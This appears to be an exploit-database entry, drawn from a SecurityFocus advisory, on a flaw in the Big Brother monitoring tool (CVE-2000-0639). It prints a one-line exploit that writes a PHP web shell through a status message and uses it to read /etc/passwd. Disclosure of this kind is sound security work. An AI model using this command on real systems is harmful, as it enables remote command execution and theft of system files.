source: http://www.securityfocus.com/bid/1494/info A vulnerability in Big Brother exists which would allow a user to remotely create CGI scripts which could be requested from the Web Server. These could be used to read files and possibly execute commands on the web server machine. ./bb 18.104.22.168 "status evil.php3 <?<system(\"cat /etc/passwd\");?>" will allow viewing of the /etc/passwd upon browsing to http://22.214.171.124/bb/logs/evil.php3.
Related ExploitsTrying to match CVEs (1): CVE-2000-0639
Trying to match OSVDBs (1): 1472
Other Possible E-DB Search Terms: Sean MacGuire Big Brother 1.0/1.3/1.4, Sean MacGuire Big Brother 1.0, Sean MacGuire Big Brother
|2000-07-11||20068||Sean MacGuire Big Brother 1.x - Directory Traversal||Eric Hines|